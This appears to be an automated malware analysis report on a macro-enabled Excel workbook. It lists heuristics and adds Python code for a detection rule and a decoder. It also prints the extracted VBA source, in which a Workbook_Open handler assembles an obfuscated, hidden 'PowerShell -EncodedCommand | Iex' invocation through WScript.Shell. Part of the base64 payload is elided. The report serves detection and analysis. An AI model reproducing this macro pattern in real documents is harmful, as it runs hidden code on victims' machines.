Verdict: MALICIOUS
Risk Score: 170

Malware Insights

MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic; T1203 Exploitation for Client Execution
The OOXML workbook contains a VBA project with a Workbook_Open handler, so the macro runs as soon as the document is opened with macros enabled. Workbook_Open calls aiom.itm, which assembles a command string from single-character lookups (hff(n) returns Chr(n - 114)) followed by a long base64 body, then hands it to Function rsosnqebjhymzq, which instantiates WScript.Shell via CreateObject and calls .Run with window style 0 (7 - 7), i.e. a hidden window. The Chr() prefix decodes to `cmd /c PO^W^eRs^he^Ll -E `: a caret-obfuscated PowerShell invocation with -EncodedCommand, which cmd.exe de-escapes to POWeRsheLl -E. The visible tail of the base64 body decodes (UTF-16LE) to `"))|Iex`, so the encoded command closes a quoted base64 string, decodes it, and pipes the result to Invoke-Expression. The other subs (Selection.InsertBefore, ActiveDocument.Paragraphs, Selection.ParagraphFormat) use the Word object model, would fail in Excel, and are filler intended to dilute the malicious code. The base64 body is not fully recoverable from the extracted source, so the inner PowerShell and any payload URL could not be reconstructed. Note on the ATT&CK tags: no exploit is evidenced; execution depends on the user enabling macros, which corresponds to T1204.002 User Execution: Malicious File rather than T1203.
Heuristics (6)

| Heuristic | Severity | Rule ID | Detail |
|---|---|---|---|
| VBA project inside OOXML | medium | OOXML_VBA | Document contains a VBA project (VBA macros present); 4 related findings |
| WScript.Shell usage | critical | OLE_VBA_WSCRIPT | Matched line in script: `ccqsqwjmohopq = "WSCript.shell"` |
| CreateObject call | high | OLE_VBA_CREATEOBJ | Matched line in script: `Set ohumcsesvacjtkbflimjcfa = CreateObject(ccqsqwjmohopq)` |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. |
| Workbook_Open macro | low | OLE_VBA_WBOPEN | Matched line in script: `Private Sub workbook_open()` |
| Suspicious extracted artifact | info | EXTRACTED_FILE_STATIC_TRIAGE | One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. |
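The OLE_VBA_PCODE_AUTOEXEC_EXEC rule above is a co-occurrence test rather than a single-token match. The following is an added example, not the analyzer's own code, of that pairing logic in Python. It assumes the two token lists quoted in the rule description, uses case-insensitive matching on identifier boundaries (VBA is case-insensitive, and this sample spells the entry point `workbook_open` and the ProgID `WSCript.shell`), and runs over a text rendering of the macro; the real rule runs over compiled p-code/cache streams, where the same matcher would be applied to the strings pulled from the stream. The sample inputs are constructed from lines of the preview further down and from two benign stand-ins.

```python
import re

# Token lists as quoted in the OLE_VBA_PCODE_AUTOEXEC_EXEC rule description.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")

# Constructed inputs: the first is built from lines of this sample's preview,
# the other two are benign stand-ins that carry only one half of the pairing.
SAMPLE_MACRO = '''Private Sub workbook_open()
aiom.itm
End Sub
Function rsosnqebjhymzq(czhsslvlqaiggqivusgtbgvhlmgaet As String)
ccqsqwjmohopq = "WSCript.shell"
Set ohumcsesvacjtkbflimjcfa = CreateObject(ccqsqwjmohopq)
dsgqhnnhkqpveahffuhxjqrncsqtizuohfd = ohumcsesvacjtkbflimjcfa.Run(czhsslvlqaiggqivusgtbgvhlmgaet, 0)
End Function'''
ONLY_AUTOEXEC = 'Private Sub Workbook_Open()\nMsgBox "hello"\nEnd Sub'
ONLY_EXEC = 'Sub Helper()\nSet fso = CreateObject("Scripting.FileSystemObject")\nEnd Sub'


def find_tokens(text: str, tokens) -> list:
    """Return the tokens present in text, in list order. Matching is case-insensitive
    and bounded by non-identifier characters, so `Shell` hits `WSCript.shell` but
    `ShellExecute` is reported only by its own entry."""
    hits = []
    for tok in tokens:
        pattern = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pattern, text, re.IGNORECASE):
            hits.append(tok)
    return hits


def pcode_autoexec_exec(text: str) -> dict:
    """The pairing rule: fires only when an auto-exec entry point AND an execution
    token both occur in the same stream/module text."""
    autoexec = find_tokens(text, AUTOEXEC_TOKENS)
    execs = find_tokens(text, EXEC_TOKENS)
    return {"fires": bool(autoexec) and bool(execs),
            "autoexec": autoexec, "exec": execs}


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_MACRO), ("only autoexec", ONLY_AUTOEXEC),
                       ("only exec", ONLY_EXEC)):
        print(name, pcode_autoexec_exec(text))
```

The boundary lookarounds matter in practice: without them `Shell` would also match `ShellExecute` and double-count, and without IGNORECASE the lowercase `workbook_open` in this sample would be missed entirely.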
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8966 bytes | 5dd8e7ed7c970a4ed478e98a7f7bb6b106a12f384129e7dde58aa9a29ddfa545 | No threats found | likely (carved artifact contains 10 long base64-like blobs) |
Preview script (macros.bas): first 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub AddTextBeforeSelection()
Selection.InsertBefore Text:="new text "
End Sub
Private Sub workbook_open()
aiom.itm
iuyi = bfghfgfgh
End Sub
Sub InsertTextAtEndOfDocument()
ActiveDocument.Content.InsertAfter Text:=" The end."
End Sub
Attribute VB_Name = "Hoja1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "aiom"
Sub SetParagraphRange()
Dim docActive As Document
Dim rngParagraphs As Range
Set docActive = ActiveDocument
Set rngParagraphs = docActive.Range(Start:=docActive.Paragraphs(2).Range.Start, _
End:=docActive.Paragraphs(3).Range.End)
End Sub
Sub itm()
pbrr = hff(213) & hff(223) & hff(214) & hff(146) & hff(161) & hff(213) & hff(146) & hff(194) & hff(193) & hff(208) & hff(201) & hff(208) & hff(215) & hff(196) & hff(229) & hff(208) & hff(218) & hff(215) & hff(208) & hff(190) & hff(222) & hff(146) & hff(159) & hff(183) & hff(146)
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "BkAFEAQgBNAEEARwBVAEEASQBBAEIAQwBBAEcAawBBAFYAQQBCAFQAQQBIAFEAQQBVAGcAQgBCAEEARQA0AEEAVQB3AEIARwBBAEcAVQBBAFUAZwBBADcAQQBBADAAQQBDAGcAQgB6AEEARgBRAEEAWQBRAEIAUwBBAEgAUQBBAEwAUQBCAGkAQQBHAGsAQQBkAEEAQgBUAEEASABRAEEAVQBnAEIAaABBAEUANABBAGMAdwBCAG0AQQBHAFUAQQBjAGcAQQBnAEEAQwAwAEEAVQB3AEIAdgBBAEYAVQBBAFUAZwBCAGoAQQBHAFUAQQBJAEEAQQBrAEEARwBnAEEAZABRAEIAMABBAEgAUQBBAGUAUQBCAGoAQQBIAE0AQQBZAFEAQgA1AEEASABFAEEAYwBBAEEAZwBBAEMAMABBAFIAQQBCAEYAQQBGAE0AQQBkAEEAQgBwAEEARwA0AEEAWQBRAEIAVQBBAEcAawBBAFQAdwBCAHUAQQBDAEEAQQBKAEEAQgA2AEEARwBNAEEAZABBAEIAeABBAEgAawBBAGIAUQBCAHIAQQBHADQAQQBhAFEAQgByAEEASABJAEEAYwBBAEI"
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "wBBAEEAMwBBAEQASQBBAE0AUQBBAHkAQQBEAGcAQQBOAEEAQQB4AEEARABNAEEATQBRAEEANABBAEQAWQBBAE4AUQBBADEAQQBEAFUAQQBPAFEAQQA0AEEARABVAEEATAB3AEIANgBBAEcAbwBBAGQAUQBCAFEAQQBHAFEAQQBaAHcAQgBYAEEARQBJAEEATwBRAEIAdwBBAEYAZwBBAFkAZwBCAFYAQQBHAFEAQQBRAHcAQQB1AEEARwBVAEEAZQBBAEIAbABBAEMAYwBBAEkAQQBBAGsAQQBIAG8AQQBhAFEAQgAwAEEARwBzAEEAYQB3AEIAbgBBAEcAMABBAGUAZwBCAG0AQQBIAGcAQQBjAGcAQgBxAEEARwBZAEEAZQBBAEIAeABBAEgASQBBAGIAUQBCAGoAQQBHAFEAQQBkAEEAQgBzAEEARwBzAEEAZAB3AEIAagBBAEcATQBBAFoAQQBCAHQAQQBEAHMAQQBEAFEAQQBLAEEASABnAEEAWgB3AEIAdwBBAEcARQBBAGUAUQBCAHUAQQBIAGsAQQBkAEEAQgBuAEEASABjAEEAWgBnAEIANgBBAEcAMABBAGUAUQBCAD"
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "..."   ' base64 fragment not reproduced in this preview
pbrr = pbrr & "QQBCADAAQQBIAEEAQQBjAHcAQQA2AEEAQwA4AEEATAB3AEIAagBBAEcAUQBBAGIAZwBBAHUAQQBHAFEAQQBhAFEAQgB6AEEARwBNAEEAYgB3AEIAeQBBAEcAUQBBAFkAUQBCAHcAQQBIAEEAQQBMAGcAQgBqAEEARwA4AEEAYgBRAEEAdgBBAEcARQBBAGQAQQBCADAAQQBHAEUAQQBZAHcAQgBvAEEARwAwAEEAWgBRAEIAdQBBAEgAUQBBAGMAdwBBAHYAQQBEAGcAQQBOAHcAQQB3AEEARABZAEEATgB3AEEAegBBAEQAYwBBAE4AQQBBADIAQQBEAGMAQQBOAHcAQQAwAEEARABVAEEATwBRAEEAMwBBAEQAWQBBAE4AUQBBAHkAQQBDADgAQQBPAEEAQQAzAEEARABJAEEATQBRAEEAeQBBAEQAZwBBAE4AQQBBAHgAQQBEAE0AQQBNAFEAQQA0AEEARABZAEEATgBRAEEAMQBBAEQAVQBBAE8AUQBBADQAQQBEAFUAQQBMAHcAQgA2AEEARwBvAEEAZABRAEIAUQBBAEcAUQBBAFoAdwBCAFgAQQBFAEkAQQBPAFEAQgB3A"
pbrr = pbrr & "EEARgBnAEEAWQBnAEIAVgBBAEcAUQBBAFEAdwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAawBBAEgAbwBBAGEAUQBCADAAQQBHAHMAQQBhAHcAQgBuAEEARwAwAEEAZQBnAEIAbQBBAEgAZwBBAGMAZwBCAHEAQQBHAFkAQQBlAEEAQgB4AEEASABJAEEAYgBRAEIAagBBAEcAUQBBAGQAQQBCAHMAQQBHAHMAQQBkAHcAQgBqAEEARwBNAEEAWgBBAEIAdABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAD0AIgApACkAfABJAGUAeAA="
On Error Resume Next
yzvvazyr = pbrr
rsosnqebjhymzq (yzvvazyr)
End Sub
Sub SetRangeForFirstTenCharacters()
Dim rngTenCharacters As Range
Set rngTenCharacters = ActiveDocument.Range(Start:=0, End:=10)
End Sub
Function rsosnqebjhymzq(czhsslvlqaiggqivusgtbgvhlmgaet As String)
djrnanaczokdqyecajc = 7 - 7
csdcsd = "asda sadsa sda"
ccqsqwjmohopq = "WSCript.shell"
Set ohumcsesvacjtkbflimjcfa = CreateObject(ccqsqwjmohopq)
dsgqhnnhkqpveahffuhxjqrncsqtizuohfd = ohumcsesvacjtkbflimjcfa.Run(czhsslvlqaiggqivusgtbgvhlmgaet, djrnanaczokdqyecajc)
End Function
Sub SetRangeForFirstThreeWords()
Dim docActive As Document
Dim rngThreeWords As Range
Set docActive = ActiveDocument
Set rngThreeWords = docActive.Range(Start:=docActive.Words(1).Start, _
End:=docActive.Words(3).End)
End Sub
Function hff(bgfbg As Variant)
bcvv = "gfgdfs vxcb 98"
hff = Chr(bgfbg - 114)
fgdsg = "vcxb xvcb sgd vcxb fsdg fgsdgdf"
End Function
Sub Macro1()
With Selection.ParagraphFormat
.LeftIndent = InchesToPoints(0)
.RightIndent = InchesToPoints(0)
.SpaceBefore = 6
.SpaceAfter = 6
.LineSpacingRule = 0
.Alignment = wdAlignParagraphLeft
.WidowControl = True
.KeepWithNext = False
.KeepTogether = False
.PageBreakBefore = False
.NoLineNumber = False
.Hyphenation = True
.FirstLineIndent = InchesToPoints(0)
.OutlineLevel = 10
End With
End Sub
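The following is an added worked example, not code from the report or the analyzer, that decodes the parts of the command visible in the preview above: the hff() lookups on the first `pbrr` line of Sub itm, and the last 68 characters of the final `pbrr = pbrr & "..."` fragment, which is the end of the base64 argument to PowerShell -E. It assumes nothing beyond the preview except that the inner quoted string is also base64-encoded UTF-16LE, which the decoder checks by producing readable text from it.

```python
import base64

# Arguments of the 25 hff() calls on the first `pbrr = hff(...) & ...` line of
# Sub itm, copied from the extracted macro in order.
HFF_ARGS = [213, 223, 214, 146, 161, 213, 146, 194, 193, 208, 201, 208, 215,
            196, 229, 208, 218, 215, 208, 190, 222, 146, 159, 183, 146]

# Last 68 characters of the final `pbrr = pbrr & "..."` fragment. A base64 string
# ends on a 4-character group boundary, so any suffix whose length is a multiple
# of 4 decodes without further alignment.
TAIL_B64 = "QgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAD0AIgApACkAfABJAGUAeAA="


def hff(n: int) -> str:
    """Python equivalent of the macro's Function hff: Chr(n - 114)."""
    return chr(n - 114)


def decode_hff_prefix(args) -> str:
    """Rebuild the string the macro assembles with `hff(a) & hff(b) & ...`."""
    return "".join(hff(n) for n in args)


def strip_cmd_carets(cmdline: str) -> str:
    """cmd.exe treats ^ as an escape character, so PO^W^eRs^he^Ll is run as POWeRsheLl."""
    return cmdline.replace("^", "")


def decode_utf16le_b64_tail(frag: str) -> str:
    """Decode the tail of a base64-encoded UTF-16LE string (the -EncodedCommand
    format) when only its last part is available: trim leading characters so the
    suffix is group-aligned, then drop a stray first byte if the byte count is odd
    (it is the high byte of a code unit whose low byte was cut off)."""
    frag = frag[len(frag) % 4:]
    raw = base64.b64decode(frag)
    if len(raw) % 2:
        raw = raw[1:]
    return raw.decode("utf-16-le")


def recover_visible_command() -> dict:
    """Apply the steps above to the fragments visible in the preview."""
    prefix = decode_hff_prefix(HFF_ARGS)
    outer_tail = decode_utf16le_b64_tail(TAIL_B64)
    # The outer command ends in `...="))|Iex`: a quoted base64 string, two closing
    # parentheses, and a pipe into Invoke-Expression. The text before the quote is
    # the end of that inner base64 string; assumption: it is UTF-16LE as well.
    inner_b64 = outer_tail.split('"', 1)[0]
    inner_tail = decode_utf16le_b64_tail(inner_b64)
    return {
        "prefix": prefix,
        "prefix_as_run": strip_cmd_carets(prefix),
        "outer_tail": outer_tail,
        "inner_b64_tail": inner_b64,
        "inner_tail": inner_tail,
    }


if __name__ == "__main__":
    for key, value in recover_visible_command().items():
        print(f"{key:15s} {value!r}")
```

The prefix comes out as `cmd /c PO^W^eRs^he^Ll -E ` (PowerShell with an encoded command, hidden by the window-style 0 passed to WScript.Shell.Run), the outer tail as `BhAHQAYwBoAHsAfQA="))|Iex`, and the inner tail as `tch{}`, consistent with an empty catch block closing the decoded script. Everything between the prefix and this tail is missing from the extracted source, so the decoder deliberately stops here rather than guessing at the payload.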
| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 29184 bytes | 51aa268945e1826c0823a4398df999352b5320bd8d33994608b8bafbf6739dbc | No threats found | likely (carved artifact contains 10 long base64-like blobs) |